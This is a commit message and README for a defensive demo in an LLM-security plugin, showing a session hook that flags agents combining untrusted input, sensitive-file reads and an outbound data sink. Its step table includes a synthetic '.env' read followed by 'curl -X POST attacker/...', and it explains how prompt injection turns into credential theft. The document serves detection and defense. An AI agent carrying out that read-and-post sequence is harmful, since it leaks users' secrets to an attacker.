Kjell Tore Guttormsen 583a78c6cc feat(llm-security): add lethal-trifecta + mcp-rug-pull example contents [skip-docs]
Companion to 8df5d5c (which only carried the doc updates — the example
directories themselves were left out of staging by mistake). This
commit adds the actual example directories:

- examples/lethal-trifecta-walkthrough/{README.md, run-trifecta.mjs,
  expected-findings.md}
- examples/mcp-rug-pull/{README.md, run-rug-pull.mjs,
  expected-findings.md}

Plus plugin CLAUDE.md "Examples (runnable demonstrations)" section
with a 4-row table covering malicious-skill-demo, prompt-injection-
showcase, lethal-trifecta-walkthrough, and mcp-rug-pull plus the
state-isolation discipline notes.

Marketplace root README unchanged since plugin's outward coverage
is unchanged ([skip-docs] covers the marketplace-level gate).
2026-05-05 14:45:39 +02:00

Lethal Trifecta Walkthrough

WARNING: This is a security demonstration fixture, NOT a real attack. All payloads are synthetic. No external network is contacted, no real file is read, no real command is executed. The script only feeds JSON payloads to one of llm-security's hook scripts.

What this demonstrates

The Rule of Two (Meta, Oct 2025): an agent must never simultaneously hold all three of:

  1. Untrusted input — content the model didn't author (web pages, MCP output, document uploads, prompt injection surface)
  2. Sensitive data access — files like .env, .ssh/, .aws/, credential stores
  3. Exfiltration sink — a path off the box (HTTP POST, scp, paste sites)

Any two are acceptable. All three at once is the lethal trifecta (Simon Willison / Invariant Labs framing) — at that point, prompt injection becomes credential theft.

post-session-guard.mjs (PostToolUse hook on every tool) tracks tool calls in a 20-call sliding window and emits a SECURITY ADVISORY when all three classes appear. This walkthrough shows it firing on a 5-step sequence.
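
The sliding-window check described above can be sketched roughly as follows. This is a minimal illustration, not the hook's actual code: the `classify` rules, the payload field names, and the `attacker.example` URL are assumptions made for the example. Only the three class names and the 20-call window come from this README.

```javascript
// Hypothetical sketch: class names mirror the walkthrough table; the
// classification rules below are illustrative, not the hook's real ones.
const WINDOW_SIZE = 20; // window length stated in this README
const TRIFECTA = ['input_source', 'data_access', 'exfil_sink'];

// Toy classifier (assumption): maps a tool call to one class or 'neutral'.
function classify(call) {
  const { tool_name: tool, tool_input: input = {} } = call;
  if (tool === 'WebFetch') return 'input_source';
  if (tool === 'Read' && /\.env$|\.ssh\/|\.aws\//.test(input.file_path ?? '')) {
    return 'data_access';
  }
  if (tool === 'Bash' && /\bcurl\b.*-X\s+POST/.test(input.command ?? '')) {
    return 'exfil_sink';
  }
  return 'neutral';
}

// Returns true when the last WINDOW_SIZE calls cover all three classes.
function trifectaInWindow(calls) {
  const seen = new Set(calls.slice(-WINDOW_SIZE).map(classify));
  return TRIFECTA.every((cls) => seen.has(cls));
}

const calls = [
  { tool_name: 'WebFetch', tool_input: { url: 'https://example.com' } },
  { tool_name: 'Read', tool_input: { file_path: '/path/.env' } },
  { tool_name: 'Bash', tool_input: { command: 'curl -X POST https://attacker.example/ -d @-' } },
];

console.log(trifectaInWindow(calls.slice(0, 2))); // false
console.log(trifectaInWindow(calls));             // true
```

Because only the most recent 20 calls are inspected, a leg that scrolls out of the window no longer counts toward the trifecta in this sketch.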

Sequence

| # | Tool | Class | Advisory? |
|---|------|-------|-----------|
| 1 | WebFetch | input_source | no (only one class) |
| 2 | Read /path/.env | data_access (sensitive) | no (only two classes) |
| 3 | Bash curl -X POST attacker/... | exfil_sink | YES (trifecta closes) |
| 4 | Bash ls -la | neutral | no (already warned in window) |
| 5 | Bash curl -X POST attacker/... | exfil_sink | no (suppressed) |

The advisory at step 3 lists the evidence and recommends remediations (disable HTTP exfil, gate sensitive-path reads, narrow tool surface). Steps 4 and 5 are present to show suppression: post-session-guard writes a warning marker into the state file so the operator isn't spammed by the same trifecta repeating within the window.
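
One way to picture the suppression logic is the sketch below. It is a simplification under stated assumptions: `state` is an in-memory array standing in for the JSONL state file, and the record shapes (`{ cls }` and `{ marker: 'trifecta_warned' }`) are hypothetical names chosen for the example. In this sketch the marker itself occupies a slot in the window, which may differ from the real hook.

```javascript
// Hypothetical sketch: `state` stands in for the JSONL state file, and the
// record shapes ({ cls } and { marker }) are assumptions for illustration.
const WINDOW = 20;
const LEGS = ['input_source', 'data_access', 'exfil_sink'];

// Appends one classified call and returns true only if an advisory should
// be emitted for it.
function recordCall(state, cls) {
  state.push({ cls });
  const recent = state.slice(-WINDOW);
  const seen = new Set(recent.map((entry) => entry.cls));
  const complete = LEGS.every((leg) => seen.has(leg));
  const alreadyWarned = recent.some((entry) => entry.marker === 'trifecta_warned');
  if (!complete || alreadyWarned) return false;
  state.push({ marker: 'trifecta_warned' }); // remember that we warned
  return true;
}

// The five steps of the walkthrough, already classified.
const state = [];
const sequence = ['input_source', 'data_access', 'exfil_sink', 'neutral', 'exfil_sink'];
const advisories = sequence.map((cls) => recordCall(state, cls));
console.log(advisories); // [ false, false, true, false, false ]
```

The output matches the Advisory? column of the sequence table: only step 3 emits, and the repeat at step 5 is suppressed because the marker is still inside the window.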

How to run

cd plugins/llm-security
node examples/lethal-trifecta-walkthrough/run-trifecta.mjs

# Detailed output (full advisory text + stderr)
node examples/lethal-trifecta-walkthrough/run-trifecta.mjs --verbose

Expected: 5 pass, 0 fail and a SECURITY ADVISORY (session-guard) preview after step 3.
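
For readers who want to see what "feeding a JSON payload to a hook" looks like mechanically, here is a minimal sketch. It does not reproduce run-trifecta.mjs. The stand-in hook, the `runHook` helper, and the exact payload fields are assumptions for illustration; a real run would spawn hooks/scripts/post-session-guard.mjs instead of the inline stand-in.

```javascript
const { spawnSync } = require('node:child_process');

// Stand-in hook (assumption): reads JSON from stdin, echoes the tool name
// to stderr, and exits 0. It only illustrates the stdin/stderr plumbing.
const STAND_IN_HOOK = `
  let raw = '';
  process.stdin.on('data', (chunk) => { raw += chunk; });
  process.stdin.on('end', () => {
    const payload = JSON.parse(raw);
    console.error('saw ' + payload.tool_name);
  });
`;

// Spawns the hook once, pipes the payload to its stdin, and collects the
// exit status plus whatever the hook wrote to stderr.
function runHook(payload) {
  const result = spawnSync(process.execPath, ['-e', STAND_IN_HOOK], {
    input: JSON.stringify(payload),
    encoding: 'utf8',
  });
  return { status: result.status, stderr: result.stderr.trim() };
}

// Payload field names are an assumption about the PostToolUse input shape.
const outcome = runHook({
  hook_event_name: 'PostToolUse',
  tool_name: 'WebFetch',
  tool_input: { url: 'https://example.com' },
});
console.log(outcome);
```

Each step of the walkthrough would be one such invocation, with the pass/fail check comparing the exit status and stderr against what the step expects.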

Hooks / scanners involved

  • hooks/scripts/post-session-guard.mjs — the only hook invoked. Configurable via policy.json trifecta.mode (block / warn / off; default warn) or env var LLM_SECURITY_TRIFECTA_MODE.

This example uses mode: warn (default). In block mode the third call's advisory becomes a hard block (exit 2) and the agent action is denied — see docs/security-hardening-guide.md §3 for when to switch.
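
The mode selection might be resolved along these lines. This is a sketch under a loud assumption: it lets the environment variable override policy.json, which this README does not confirm. The function names `resolveTrifectaMode` and `exitCodeFor` are hypothetical.

```javascript
// Hypothetical sketch. Assumption: the env var wins over policy.json; this
// README does not state the real precedence.
const VALID_MODES = ['block', 'warn', 'off'];

// Picks the first valid mode from env, then policy, then the default.
function resolveTrifectaMode(env, policy) {
  const candidates = [env.LLM_SECURITY_TRIFECTA_MODE, policy?.trifecta?.mode];
  return candidates.find((mode) => VALID_MODES.includes(mode)) ?? 'warn';
}

// Maps a detected trifecta to an exit code: 2 denies the action in block
// mode, 0 lets it through (with or without an advisory).
function exitCodeFor(mode, trifectaDetected) {
  return mode === 'block' && trifectaDetected ? 2 : 0;
}

console.log(resolveTrifectaMode({}, {}));                                      // warn
console.log(resolveTrifectaMode({}, { trifecta: { mode: 'off' } }));           // off
console.log(resolveTrifectaMode({ LLM_SECURITY_TRIFECTA_MODE: 'block' }, {})); // block
console.log(exitCodeFor('block', true));                                       // 2
console.log(exitCodeFor('warn', true));                                        // 0
```

Unknown values fall back to warn in this sketch, so a typo in the variable cannot silently turn detection off.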

OWASP / framework mapping

| Code | Framework | Why |
|------|-----------|-----|
| LLM01 | OWASP LLM Top 10 (2025) | Prompt injection lands via the input_source leg |
| LLM02 | OWASP LLM Top 10 (2025) | Sensitive information disclosure (the .env exfil) |
| ASI01 | OWASP Agentic Top 10 | Excessive Agency: agent holds all three capabilities |
| ASI02 | OWASP Agentic Top 10 | Agent Data Leakage: exfil sink + sensitive read |

State isolation

post-session-guard stores per-session state at ${os.tmpdir()}/llm-security-session-${ppid}.jsonl. Because all five hook invocations are spawned by the same run-trifecta.mjs process, they share that script's PID as their parent PID, so the entire walkthrough lives in a single state file. The script deletes the file in a finally block before exiting. Hooks in a real session run under a different parent PID and therefore use a different file in the same temp directory, so your real session state is never touched.
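
The parent-PID keying can be checked with a small sketch like the one below. The helper names `stateFileFor` and `childPpid` are hypothetical; only the path pattern and the finally-block cleanup come from the description above.

```javascript
const fs = require('node:fs');
const os = require('node:os');
const path = require('node:path');
const { spawnSync } = require('node:child_process');

// Path pattern as described above, parameterized on a parent PID.
function stateFileFor(ppid) {
  return path.join(os.tmpdir(), `llm-security-session-${ppid}.jsonl`);
}

// Spawns a child that prints its own process.ppid, which is this script's PID.
function childPpid() {
  const child = spawnSync(process.execPath, ['-p', 'process.ppid'], { encoding: 'utf8' });
  return Number(child.stdout.trim());
}

const stateFile = stateFileFor(process.pid);
let childPaths = [];
try {
  // Two separate children resolve to the same state file path.
  childPaths = [childPpid(), childPpid()].map(stateFileFor);
} finally {
  fs.rmSync(stateFile, { force: true }); // no-op if the file was never created
}

console.log(childPaths.every((p) => p === stateFile)); // true
```

A hook launched from a different parent process would compute a different file name, which is why the walkthrough cannot collide with a live session.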

Limitations

  • The walkthrough demonstrates the primary 20-call sliding-window trifecta. It does not exercise the 100-call slow-burn variant (SLOW_BURN_MIN_SPREAD = 50), the MCP-concentrated variant (all three legs from the same MCP server), behavioral drift via Jensen-Shannon divergence, or volume-threshold advisories. Those have their own unit tests under tests/lib/post-session-guard.*.
  • Detection is deterministic. The walkthrough runs in the default warn mode, so it does not exercise the block-mode exit-2 path; set LLM_SECURITY_TRIFECTA_MODE=block and re-run if you want to see the script fail at step 3.

See also

  • docs/security-hardening-guide.md §3 — Rule of Two and configuration
  • knowledge/owasp-agentic-top10.md — ASI01 / ASI02 background
  • knowledge/deepmind-agent-traps.md — adjacent attack categories
  • examples/prompt-injection-showcase/ — the input_source leg in isolation
  • expected-findings.md (in this folder) — the testable contract